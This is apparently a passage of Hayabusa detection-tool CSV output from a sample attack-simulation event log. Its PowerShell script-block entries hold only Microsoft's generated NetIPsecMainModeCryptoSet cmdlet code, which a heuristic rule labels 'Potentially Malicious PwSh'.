($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function 
Set-NetIPsecMainModeCryptoSe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 